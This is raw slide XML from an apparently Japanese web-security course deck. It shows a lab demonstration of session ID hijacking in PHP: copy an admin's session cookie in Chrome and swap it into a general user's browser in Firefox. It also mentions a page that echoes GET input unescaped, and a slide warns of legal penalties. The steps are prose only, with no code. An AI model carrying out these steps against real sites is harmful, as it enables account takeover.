            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4CE902-B342-244E-082C-A5FD479A475C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818530" y="4892902"/>
            <a:ext cx="8682162" cy="1965098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4116574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B522DB-512D-E6C6-4792-FBFB111989F4}"/>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2BB93039-B79A-5F94-999E-1E5B4AB7F75A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2334C01B-52C0-AA2B-49D9-9EC3D30B7CAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1688989" y="2253731"/>
            <a:ext cx="4035567" cy="1467479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB70BE78-F258-EF3B-F292-0083E16367FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6098649" y="2253731"/>
            <a:ext cx="3987611" cy="1472573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="テキスト ボックス 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1458620F-F305-09FB-5AD4-70DFBF7904E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2344860" y="3721210"/>
            <a:ext cx="2723823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>管理者のセッション作成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="テキスト ボックス 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75869025-A732-A13A-AB63-35276A322696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6730542" y="3721210"/>
            <a:ext cx="2723823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>一般人</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のセッション作成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="図 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB268D1-DA79-BA81-0E37-278A8B9D94D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1688989" y="4108230"/>
            <a:ext cx="4035567" cy="1863065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="テキスト ボックス 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3831EA-A186-6984-D69A-7E7F698FEE0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2575692" y="6009985"/>
            <a:ext cx="2262158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>権限を表示する画面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="図 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B0ABDBB-D74F-61EC-5E64-DD1BFFD0E701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549187" y="4980557"/>
            <a:ext cx="3086531" cy="990738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="テキスト ボックス 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10FFEB95-5314-B561-8E6E-A608CC1C5EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694199" y="6009985"/>
            <a:ext cx="4796506" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で受け取った値をそのまま表示する画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2326052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134C7-4547-FBF5-49EE-3F69A0CC1612}"/>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3631B510-7130-1BBE-7CDC-64C824DCF492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>GoogleChrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザでは管理者セッションを発行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2F7B6F0-138B-D3B5-F828-9413D484AB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994915" y="2907883"/>
            <a:ext cx="8202170" cy="2600688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2090655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F8B363-9558-FCFF-1FC8-D9BDD6B0CAE8}"/>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7F223957-399E-264A-67CB-C0800A575702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>GoogleChrome</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いてクッキーを表示する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ここでセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が表示されるので内容をコピーする。</a:t>
            </a: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70FEB236-8F9F-42E5-D0C3-40320762F9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3304749"/>
            <a:ext cx="10515600" cy="2414514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="518184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5C499E-EAAB-1F98-66CF-995A3793D1C4}"/>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7825186E-E15D-E9D6-8337-18FDA6B56B62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で一般ユーザのセッション発行画面に行く</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD239BC-4C89-0E8C-911D-2BC774AAF587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1837730" y="2810503"/>
            <a:ext cx="8516539" cy="2381582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2693969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8D268C-7C25-26D2-0C24-8AAF4B28125F}"/>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AEEFEC37-4163-2CAD-04B6-0706FF2E4527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で権限を表示する画面にアクセスして権限が一般ユーザであることを確認する。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB627318-910F-58DF-4993-5A17CB5C615B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2656995" y="3192404"/>
            <a:ext cx="6878010" cy="2429214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2655672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C165A4-9386-4237-D376-1BB6B0F2DA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>注意</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74D2B97-C91B-8D6A-9EF3-9285FA04566E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>また、本講座で学ぶ不正アクセスの手法を外部のサイトに行うと以下の罪に問われる可能性があります。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセス禁止法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>電子契約法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>電磁的記録不正作出および供与罪</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>電子計算機損壊等業務妨害罪</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>電子計算機使用詐欺罪</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2300944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D896AC-AA44-A45D-24C9-CC8255D68691}"/>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ECFBD8D7-8DE2-0C9D-0A0D-8A4FAFE3D67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のブラウザ画面を右クリックして「調査」をクリックしてストレージメニューを開く</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF3048E-CFB2-73C1-26B2-17B10853D33B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622066" y="3119356"/>
            <a:ext cx="8947868" cy="3180687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111440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AED6AA-1020-4ED3-CB57-B294CE113E4B}"/>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52F836E0-3B4D-505E-3630-AEAB830B67AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッションキーハイジャック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
